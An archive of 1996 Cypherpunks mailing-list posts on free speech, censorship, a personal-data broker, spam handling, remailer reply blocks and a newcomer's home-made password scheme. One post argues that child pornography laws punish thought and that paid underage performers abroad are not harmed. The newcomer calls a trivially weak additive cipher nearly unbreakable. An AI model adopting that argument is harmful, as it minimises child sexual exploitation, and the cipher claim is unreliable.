> We've solved all of the problems associated with pad creation,
> distribution, packaging and many other concerns that have previously
> limited the use of a cipher in this class.

Their web page alludes to a OTP-like operation where you have to
purchase key "refills".  It doesn't say where they store the escrowed
copies of the key material.

> Visit our net page at http://www.aa.net/cyber-survival-hq for more
> information, and read the reply in response to the unfounded attack by
> Curtin, posted above.

I recommend this page, if only for the great conspiracy theory about
automated telephone line scanning.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw
X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk
b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ
0MlhN5IxIBk=
=y4kc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Sep 1996 06:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <Pine.LNX.3.93.960909222327.544C-100000@smoke.suba.com>
Message-ID: <ccF2TD88w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


snow <snow@smoke.suba.com> writes:

> On Mon, 9 Sep 1996, Timothy C. May wrote:
>
> > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming
> > in this morning. I'm sure you're busy, so I'll make this as short as
> > possible. OK with you?"
> > Suspicious Persons List, and there's just nothing we can do about it. We
> > just can't have our corporate image linked to persons on the SPL. Now, Joe,
> > you'll get a generous 6 weeks of severance pay, and Daphne will assist you
> > with your outplacement processing. Of course, Joe, you will have to go
> > through an inspection every morning until you're fully processed...there's
> > that SPL matter, you know." <laughs>
> > JS: "Uh..."
>
>      In this case I wouldn't bother with Mr. Bell's solution.

This reminds me of a real story when an h.r. person walked in on some
bank employee and told her than she was being laid off. "And by the way
the no-fee bank account you had as an employee is closed, so here's an
application you have to feel for a regular account with us." He got injured.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Sep 1996 23:00:51 +0800
To: cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <2.2.32.19960910113535.00defde0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:54 PM 9/9/96 -0700, Timothy C. May wrote:
>Given the mounting hysteria about terrorism (by the government, at least),
>and given the various laws on the books, I would not be surprised to see
>some Web sites prosecuted as "harboring" terrorists terrorist-symps.
>
>If any of you are not citizens of the U.S., and are here on visas, I would
>give this some real serious thought. Of course, maybe deportation is a
>blessing in disguise.
>

Course in 1951 they tried the same thing against Commies with the Smith Act.
Even authorized concentration camps for 'em and everything.  But it didn't
work.  We were still up to our asses in Commies even with the Act.  They
even captured the White House eventually.  I don't think the anit-terroism
act will be any more effective.

DCF 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 11 Sep 1996 04:10:05 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: China joins Singapore, Germany, ....
In-Reply-To: <Pine.SUN.3.91.960910040340.12836F-100000@eff.org>
Message-ID: <3235697D.A17@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> 
> The revised Hatch "child porn" legislation criminalizes even 
> *attempting* to download the forbidden data.

What would it look like, exactly, when they went in to arrest the
AltaVista search engine?

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Lyle <matt@nova.org>
Date: Wed, 11 Sep 1996 00:20:26 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <Pine.LNX.3.93.960909113515.1028C-100000@smoke.suba.com>
Message-ID: <Pine.SOL.3.93.960910084530.23972A-100000@beta.nova.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996, snow wrote:
> On Fri, 6 Sep 1996 AwakenToMe@aol.com wrote:
> > Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces
> > of  mail you take LESS than a second to delete them both with the handy
> > delete key. These people are wasting more time complaining about it than they
> > will ever do actually deleting it.
> 
>      I would guess that AOL isn't doing it just because of user complaints.
> AOL has millions of accounts, and spammers try to hit ALL of the addresses.
> That probably (I am guessing here) doubles (or triples) the load on AOL's 
> already over burdened mail system. 

The news reports that I've read also say that, at least in the case of
Cyberpromo, 75% of their email database is AOL addresses.

Matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Tue, 10 Sep 1996 17:18:06 +0800
To: Troy Varange <varange@crl.com>
Subject: Re: Guns Don't Kill People, IP Does
In-Reply-To: <199609091802.AA16555@crl5.crl.com>
Message-ID: <Pine.LNX.3.94.960910084804.8332D-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain


> > One thought : How many of you would support terrorist
> > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
> > 
> > -stephan 
> 
> Consdering how none of the above incidents are connected in any way 
> to the internet, what do you mean?  And what if there were bomb making 

Sorry for my bad English, perhaps I got misunderstood.
Would you run a WWW site where the (say there where some)
terrorist who shot down (a wild assumtion too) the TWA plane
claiming it was right and all people should fight 'evil
America'. Because of your web site there are other bomb
attacks in the US (or somewhere else, the country is not that 
important) (although it's of course impossible to proove that
this bombings are 'inspired' by your web site).
Would you support the freedom of speech in this way ?

And to those who misunderstood my posting:
a. I support the freedom of speech.
b. I'm not shure I can support freedom of speech
in ALL circumstances.
c. I wanted to know what other people in this mailing
list thought. Would they support freedom of speech
for everyone ? Under all circumstances ?
(I hope you got my point of view now)
d. I think (hope) I'm a cypherpunk.
e. Don't mistake my opinion with the opinion of
the German Government, which I tried to
make clear (I would be the last
to support the German Government.)

-stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Sep 1996 06:25:08 +0800
To: cypherpunks@toad.com
Subject: Re: Conjuring up the latest utopia for a minoritarian sect of illuminati
Message-ID: <ae5adff700021004d426@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 PM 9/10/96, Enzo Michelangeli wrote:


>> As to what I presume is an insult to the folks on this list ("I'm
>> personally not interested in conjuring up the latest utopia for a
>> minoritarian sect of illuminati"), you know where the exit is.
>
>Triple cheers for free speech. Calling for expulsion of those who don't
>share your opinion seems to me the clearest sign of will to remain an
>enlightened minority. Then, why do you take it as an insult?

I didn't call for your "expulsion." No one has been expelled in four years
of the list's existence.

However, when people complain about not being interested in the list
topics, and refers to some of the main list topics as "conjuring up the
latest utopia for a
minoritarian sect of illuminati," then, yes, I would say this is insulting,
or, at least, dismissive.

As with a restaurant, if people complain loudly about the food, they ought
to leave and not come back. This is not the restaurant expelling them, this
is just them acting on their opinions.


--Tim May, Member of the Minoritarian Illuminati

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Cox <cox@transarc.com>
Date: Wed, 11 Sep 1996 04:11:46 +0800
To: Ben Camp <benc@geocel.com>
Subject: Re: BoS: Can you trust your ISP ??
In-Reply-To: <2.2.32.19960910063040.006e5128@lithium>
Message-ID: <Pine.SUN.3.92.960910091109.1335A-100000@sparc51.transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Sep 1996, Ben Camp wrote:
> [...] Nothing anyone does on the web is
> important enough to encrypt.

This is an astoundingly naive statement.

__
Ben Cox					cox@transarc.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Tue, 10 Sep 1996 17:35:16 +0800
To: "David M. Rose" <drose@AZStarNet.com>
Subject: Re: ... subversive leftists
In-Reply-To: <199609100157.SAA12409@web.azstarnet.com>
Message-ID: <Pine.LNX.3.94.960910090940.8332G-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



> >As to the "Reichskommander," in our country, and on the Net, such jokes are
> >not illegal. I rather suspect they are in Germany, either the DDR or the
> >Western side.
> >
> >As to "tasteless and insulting," a matter of personal perspective. I find
> >it helpful to call a spade a spade, and others apparently do as well.

Perhaps you call a spade an axe.
To all those who haven't got the point:
a. Im antifa.
b. It's easy to say things when noone can get you.
It's harder to say the truth in the face of a skin
with a baseball racket.
c. I hope I get not killed for this :)

> 
> Ja, Ja. Das ist gut. Ve make chust a little choke now.
          ^^^^^^^^^^^
Perhaps you meant:
	  Ist ja gut ;)

Was the Vance you quoted Jack Vance ? The author ... 
Just curious.

-stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Tue, 10 Sep 1996 17:38:51 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [WAS xs4all.nl] Terrorists
In-Reply-To: <0DR1TD79w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.94.960910091812.8332H-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



Perhaps my connection is only disrupted accidently, but
I can't access www.xs4all.nl from one account
(the two others still work).
IP tried : 194.109.6.100

SPG: What is the 'new' IP ?
(I hope you don't think I'm a spy for
the German Government :)

Perhaps this time we have to 
proove that it's impossible to 
block an IP/Web site, so that all govs
get a clue about who inet works.

Hmm, some may claim it's better that the
goverment thinks they sucessfully restricted
the access to those pages.
I think they should know what they can't do.

-stephan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 11 Sep 1996 07:05:29 +0800
To: Mike McNally <declan@eff.org>
Subject: Re: China joins Singapore, Germany, ....
Message-ID: <199609101626.JAA19796@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 AM 9/10/96 -0500, Mike McNally wrote:
>Declan McCullagh wrote:
>> 
>> The revised Hatch "child porn" legislation criminalizes even 
>> *attempting* to download the forbidden data.
>
>What would it look like, exactly, when they went in to arrest the
>AltaVista search engine?


"Drop those bits!  We've got you delimited!"

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Wed, 11 Sep 1996 04:09:42 +0800
To: "Cypherpunks list" <cypherpunks@toad.com>
Subject: FW: RRE: Lexis-Nexis personal information database
Message-ID: <n1369774682.50263@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Okay, here's the story.  The below is true, except they do NOT have your
mother's maiden name.  The have your name, SSN, current addy, two previous
addys, and date of birth.  They also have aliases, if available.  Their main
customers are attorneys who use this _online_ service to search for people. 
They've been in business for 20 years, but this list has only been run for 
a few months.  Their customer base (I assume including all databases, which
includes lists of ALL legal actions (traffic tickets??)) is 750,000.  Hm.  Oh,
and the SSN isn't given out, but it can be used to search for someone more
easily.  So, when you do a query, all you'll get is Name, address, phone
number, and date of birth, as well as two previous addresses, for what it's
worth.  The only thing you get that you wouldn't find out by looking in the
White Pages is the DOB, and that you could make up.  Another case of
mass-hysteria (but, of course, *I'm* no longer on the list... ;-)

BTW, they're very nice as you get taken off the computer.  LONG time on hold,
though...

Spyjure

_______________________________________________________________________________
From: E. Allen Smith on Tue, Sep 10, 1996 3:14
Subject: RRE: Lexis-Nexis personal information database
To: cypherpunks@toad.com

	One wonders exactly how much of this information is compiled from
government-generated sources? The SSN is automatically originally
government-derived, of course...
	-Allen

From:	IN%"rre@weber.ucsd.edu"  7-SEP-1996 02:02:07.36

[Excerpt from Privacy Forum 5.17.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 3 Sep 96 12:01 PDT
From: privacy@vortex.com (PRIVACY Forum)
Subject: PRIVACY Forum Digest V05 #17

PRIVACY Forum Digest      Tuesday, 3 September 1996      Volume 05 : Issue 17

-----------------------------------------------------------------------------

Date:    Tue, 3 Sep 1996 11:22:15 -0400 (EDT)
From:    Larry Hunter <hunter@intr.net>
Subject: Lexis-Nexis personal information database

Lexis-Nexis sells a commercial database called "Ptrax" which holds detailed
personal information on nearly all Americans (L-N claims it contains 300
million names).  This database includes name, current address, up to two
previous addresses, phone number, birth-date, social security number,
mother's maiden name and possible other personal information.  This database
is kept quite current.  Through the Nexis Express service, this information
could be available to any individual with a credit card.

As most readers will are aware, such information could easily be used for
theft of identity and other frauds.  It is possible to have one's name
removed from this database by making a telephone request.  Call
(800)543-6862, select option 4 ("all other questions") and tell the
representative answering that you wish to remove your name from the Ptrax
database.  You may also send a fax to (513)865-7360, or physical mail to
LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933.  Sending physical mail
to confirm your name has been removed is always a good idea.

As word of the existence of this database has spread on the net, Lexis-Nexis
has been inundated with calls, and has set up a special set of operators to
handle the volume.  In addition, Andrew Bleh (rhymes with "Play") is a
manager responsible for this product, and is the person to whom complaints
about the service could be directed.  He can be reached at the above 800
number, selection option 4 and then ask for extension 3385.

The information in this note has been been confirmed by me, and was
originally provided in forwarded messages from Russell Whitaker, Jason
Werner, Vern Winters, Katherine Florman and Reuben Snipper.

Larry Hunter
hunter@intr.net

------------------------------

End of PRIVACY Forum Digest 05.17
************************


------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;10 Sep 1996 03:14:49 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Tue, 10 Sep 1996 7:12:48 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id UAA22945 for
cypherpunks-outgoing; Mon, 9 Sep 1996 20:08:38 -0700 (PDT)
Received: from OCELOT.RUTGERS.EDU (ocelot.rutgers.edu [128.6.11.33]) by
toad.com (8.7.5/8.7.3) with SMTP id UAA22938 for <cypherpunks@toad.com>; Mon,
9 Sep 1996 20:08:25 -0700 (PDT)
Received: from mbcl.rutgers.edu by mbcl.rutgers.edu (PMDF #12194) id
 <01I9AIVKYUFO9ULM12@mbcl.rutgers.edu>; Mon, 9 Sep 1996 23:03 EDT
Date: Mon, 9 Sep 1996 23:03 EDT
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: RRE: Lexis-Nexis personal information database
To: cypherpunks@toad.com
Message-id: <01I9AIVKYUFO9ULM12@mbcl.rutgers.edu>
X-Envelope-to: cypherpunks@toad.com
X-VMS-To: IN%"cypherpunks@toad.com"
Sender: owner-cypherpunks@toad.com
Precedence: bulk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Sep 1996 07:57:27 +0800
To: cypherpunks@toad.com
Subject: Child Porn as Thoughtcrime
Message-ID: <ae5ae3bd02021004b70c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Q: Is a drawing of a child engaging in a sexual act an illegal item?

Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old
illegal?

Q: Is writing a story about a child having sex illegal?

Q: Is a collage of images of little girls (or boys, one presumes) in
swimsuits, with apparent salacious intent, illegal?

Q: Is accessing a Web site having nude or sexually-related images of
children who are of legal sexual age in the site's country--but not in the
accessor's country--illegal?

Q: Is it legal to have photographs of one's own children in a nude state?
(E.g., playing in a backyard pool, at the beach, etc.) Does it become
illegal to let others see these photographs? How about putting them on a
Web site?

Q: Is a crime committed if a teenaged girls takes a photograph of _herself_
and shows it to others? To adults? Or if she writes a salacious story about
herself or her friends? Or if she just invents it all?

Whom is exploiting whom? Which acts are crimes? I submit that the various
child porn laws we have in the United States are about the clearest
examples of "thoughtcrime" one can find, where the _thought_ is what is
being criminalized.

First, a caveat, which ought to be clear, but which is necessary to state
anyway (never know what search engines will find my words and take them out
of context). I have no unusual interest in little children. Surely some
teen girls can be sexually attractive, even if technically underage.
Nothing surprising in this, surely? But, no, I am not an advocate of "child
porn," merely wondering about the many constitutional and moral issues
involved in the panoply of laws and precedents involved.

Anyway, we have on this list various comments about "child porn" and why it
should be illegal:

-- consumption of child porn "creates a market"

-- it harms the children

-- it's disgusting

-- etc.

Clearly the first argument applies to many other things. Why not outlaw
pro-drug speech? Pro-drug speech "creates a market" for an illegal product.
Shut down "High Times," seize copies of books by Aldous Huxley and William
Burroughs, ban mocking comments about the War on Some Drugs.

The second argument, that children are actually harmed, is vitiated by the
fact that much so-called child porn comes from countries where the actors
are of legal age. How can a 14-year-old Thai girl be "harmed" when what she
is being paid to do is perfectly legal in Thailand?

(It's parallel to the situation with, say, Arab countries. Porn videos in
Saudi Arabia are of course illegal, with roughly the status of child porn
videos in the U.S. (maybe worse, as I'm sure the punishment could be
death). Are the American and European actresses in such videos being
harmed?)

And the case of morphings, drawings, stories, etc., clearly involve no
actual children, so the argument that children are harmed is empty.

(Catherine MacKinnon and Andrea Dworkin, amongst others, have argued that
"women as a class" are injured by pornography. I won't get into the issues
of this here. Suffice it to say that if speech or nonviolent acts begin to
be suppressed on the basis of "class action" cases, we're in a heap of
trouble.)

As to me argument that the images, stories, etc., are disgusting, amoral,
inappropriate, etc., well, perhaps. But what is the legal and
constitutional basis for restricting such things? Many opinions and actions
are vile and disgusting, but are not illegal.

Under what interpretation of the Constitution is the creation of a drawing
depicting, say, a 7-year-old girl having sex with someone or something a
criminal act? The obscenity laws?

(And as to the obscenity laws, which part of "Congress shall make no law"
did the readers of the First Amendment miss? I realize this is a
longstanding topic of discussion, with various famous cases (Miller,
Hustler, etc.), but it remains a mystery to me.)

My point is this: For anyone who claims that "thoughtcrime" is something
the Evil Empire specialized in, i.e., totalitarian communist regimes, look
to the enforcement of laws about what can be viewed or accessed from the
United States. Thougtcrime.

--Tim May


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 11 Sep 1996 04:41:48 +0800
To: cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
Message-ID: <199609101349.GAA00716@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[you can't bounce spam back to it's source]
> Why not? Because spammers _invariably_  forge the return addresses to keep
> exactly that from happening.

What I do is look into the headers, and start bouncing it back to the domain
administrator, if I can't find any better mail address.

Pegasus makes it easy to automate this.

I *do* send one politely worded request first - it takes a second spamming before
I'll set up the rule.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Sep 1996 07:21:38 +0800
To: cypherpunks@toad.com
Subject: Putting Pressure on Web Search Engines
Message-ID: <ae5af1ca03021004043b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:13 PM 9/10/96, Mike McNally wrote:
>Declan McCullagh wrote:
>>
>> The revised Hatch "child porn" legislation criminalizes even
>> *attempting* to download the forbidden data.
>
>What would it look like, exactly, when they went in to arrest the
>AltaVista search engine?

They won't likely go after a specific search site on child porn charges,
per se, but they may try to impose restrictions on what gets indexed
(ironically, given the name "The Index").

Just as spiders will avoid indexing some pages marked for "no index" (I
don't recall the exact syntax), so too could they avoid indexing--and hence
making available--sites which the government has declared off limits,
either in the U.S. or in foreign sites.

To the extent search engines are becoming the de facto entry point to the
Web for many of us (maybe even most of us), controlling what they are
allowed to index and then report on to customers is a powerful means of
controlling speech.

I have two predictions:

1. Alta Vista, Excite, etc., will offer services based on parental ratings,
religious ratings, etc. Like well-known site filtering services such as
SurfWatch and LolitaWatch, these services will present various indices to
various customers. To make this clearer, imagine "Alta Vista for Kids,"
with only kid-friendly (TM) sites and pages indexed.

2. Various governments will try to pressure the various search engine
operations to limit indexing of various sites and pages. While of course it
is difficult for, say, Singapore to tell Alta Vista what to index, the
Singaporans can say they'll put Alta Vista on the list of sites which
cannot be accessed easily by Singaporans. Thus will pressure be applied.


--Tim May


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 11 Sep 1996 07:22:08 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: Re: One Time Reply Blocks (was Re: strengthening remailer protocols)
Message-ID: <199609101730.KAA22130@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 PM 9/9/96 -0700, Lance Cottrell wrote:
>At 4:19 PM -0700 9/9/96, Bill Frantz wrote:
>>To paraphrase John Von Neumann, any system which uses reply blocks is in a
>>state of sin.  By this I mean that if there is a chain pointing at you, a
>>sufficiently powerful attacker can walk down that chain and find you.
>>
>>Given that, I will join the state of sin by proposing a mechanism which
>>will allow Alice to receive a reply from Bob, but change her mind at any
>>time.  The basic idea is to have a one-time reply block which either Bob or
>>Alice can send to.  If Alice thinks that too much time has elapsed, and
>>powerful enemies are walking down her reply block chain, she can send
>>herself a reply and break the chain.  (She might send a reply thru each
>>link in the chain to break all the links.)
>
>The reason the message is not resendable is that the remailers keeps track
>of the serial number of that header. If forced, the log of serial numbers
>could be deleted, and the operator would process the message.
>
>Unless you are assuming some key archived by each remailer for the reply
>block, then I think it will be possible to repair the chain.

I was thinking of storing a reply-key in each remailer.  The protocol might
go something like this (straw man proposal):

(1) Alice picks n random ids (say 160 bits or so) and n random keys.
(2) Alice sends the combination <id[i], key[i]> to remailer[i], i=0,n-1.
(3) Alice builds a reply block which consists of the remailer return path,
each element encyphered with the appropriate key and sends it to Bob.
(4) When a remailer processes a reply block element, it removes it from the
reply block, looks up the id in its database, decrypts the address of the
next hop, removes the database element and forwards the message.

If Alice becomes nervous, she sends n "replys" thru each remailer to cause
the return path to be destroyed.


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: t byfield <tbyfield@panix.com>
Date: Wed, 11 Sep 1996 06:50:13 +0800
To: cypherpunks@toad.com
Subject: Re: TWA 800 - hit by an unarmed US missile?
In-Reply-To: <199609091638.MAA19400@mail2.panix.com>
Message-ID: <v03007801ae5b36abf3b4@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 PM -0500 on 9/9/96, Vince Cate wrote:

> > vince@offshore.com.ai (Vincent Cate):
> > > If the Navy was firing missiles in this area, it really does seem
>like the
> > > press should be checking out this angle.
> >
> >    What makes you think they aren't?
>
> Not saying they aren't; however, I don't recall seeing CNN or any of the
> networks saying if the Navy really was firing missiles or not.  Have they?
> Never seen anyone ask questions about US firing missiles (have seen them
> ask if it was a missile or a bomb). I don't get any US newspapers here in
> Anguilla, so my impression of the US press is really just from TV.
>
> Is the press on top of this?

	Some good friends (Satanic Mainstream Reporters) who are working on
the case have certainly _said_ they were looking into it; of course, maybe
[your favorite conspiracy here] bought them out/blackmailed them/planted a
microchip in their bum/Stepfordized them/[your favorite subversion method
here]. Given (a) the intense competition among reporters and (b) the
near-impossibility of keeping secret something known by 1/2/3+ people, I
somehow kind of doubt the plane was shot down by a US ship--as one friend
put it, they'd have to sink the entire ship to keep it a secret, but it'd
be hard to keep it a secret why they sunk the ship, etc., etc. And,
frankly, I doubt the FBI/NTSB/et al. really know what happened. Though I
doubt they'd keep on mentioning the missile theory without _very_ good
reason to believe it's likely.

/t






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Wed, 11 Sep 1996 05:11:02 +0800
To: cypherpunks@toad.com
Subject: Re: Guns Don't Kill People, IP Does
In-Reply-To: <Pine.LNX.3.94.960910084804.8332D-100000@blau.pin.de>
Message-ID: <9609101437.AA06866@outland>
MIME-Version: 1.0
Content-Type: text/plain


> > > One thought : How many of you would support terrorist
> > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
> > > 
> > > -stephan 
> > 
> > Consdering how none of the above incidents are connected in any way 
> > to the internet, what do you mean?  And what if there were bomb making 
> 
> Sorry for my bad English, perhaps I got misunderstood.
> Would you run a WWW site where the (say there where some)
> terrorist who shot down (a wild assumtion too) the TWA plane
> claiming it was right and all people should fight 'evil
> America'. Because of your web site there are other bomb
> attacks in the US (or somewhere else, the country is not that 
> important) (although it's of course impossible to proove that
> this bombings are 'inspired' by your web site).
> Would you support the freedom of speech in this way ?

	Call me crazy, but maybe if "terrorists" had a web page to 
use to get out their particular message they wouldn't need to go out
and blow things up to get noticed (well, except for the ones in it
just for the sake of blowing things up).

> And to those who misunderstood my posting:
> a. I support the freedom of speech.
> b. I'm not shure I can support freedom of speech
> in ALL circumstances.

	Um, which one is it.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Smaug <js4smaug@eden.rutgers.edu>
Date: Wed, 11 Sep 1996 05:33:21 +0800
To: cypherpunks@toad.com
Subject: Allo allo
Message-ID: <CMM-RU.1.5.842366404.js4smaug@er6.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just figured i'd drop a hello in the box.

Hopefully at least a few of you have encountered me at some point...
For the rest, I am Si_Druid (si is for Silicon...) and i've been
around too long :)

I consider myself a cyBerpunk by a definition that myself and a group
of other CbP's came up w/ that seemed to fit best.  Whether it is best
or not is a matter of much discrepancy by the hard core "CbP is a
fictional genre" groupies, but its rather irrelevant to the rest of
the populace.

So why am i here?  Well, our ideas on CbP include just about all forms
of survival in this society, and cryptology is probably one of the
leading forms.  I figured I'd better throw my hat in the ring before
it got out of hand and i wound up eating it instead.

I'm not terribly experienced w/ crypts, pgp still annoys me, but 'back
in the day' i used to write some low level crypts that were relatively
impossible to break...
they were also impossible to decrypt, which meant that the only way to
use them was to work forward....

mostly i did password encryption schemes, this one working the best:

string        #a nice set of ascii codes
currkeyletter #letter from string in use
password      #a password from 5 to whatever characters
encrypted     #the password encrypted
char          #the current character of the password we're playing w/
stringchar    #the char # in the string

for char=0 to lengthof(password)

#getting our stringchar
stringchar=char
while stringchar >= lengthof(string) {
  stringchar=stringchar-lengthof(string)
}
currkeyletter=string[stringchar]

#writing the encrypted password
if char = 0   #first letter
encrypted[char]=resolve(password[char],0,password[char+1],string[stringchar]

else if char = lengthof(password) #last letter
encrypted[char]=resolve(password[char],encrypted[char-1],0,string[stringchar])

else
encrypted[char]=resolve(password[char],encrypted[char-1],password[char+1],
       string[stringchar])



end of for

resolve(pw,en,pw2,st){
  result=pw+en+pw2+st
  while result>=250 {
    result=result-250
  }
  return(result)
}


-----
doesnt really matter what language you write it in, the difficulty is
